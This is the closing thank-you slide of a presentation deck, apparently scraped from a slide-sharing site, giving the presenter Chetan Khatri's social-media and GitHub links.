  • 72. Thank you! Chetan Khatri, [email protected] @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri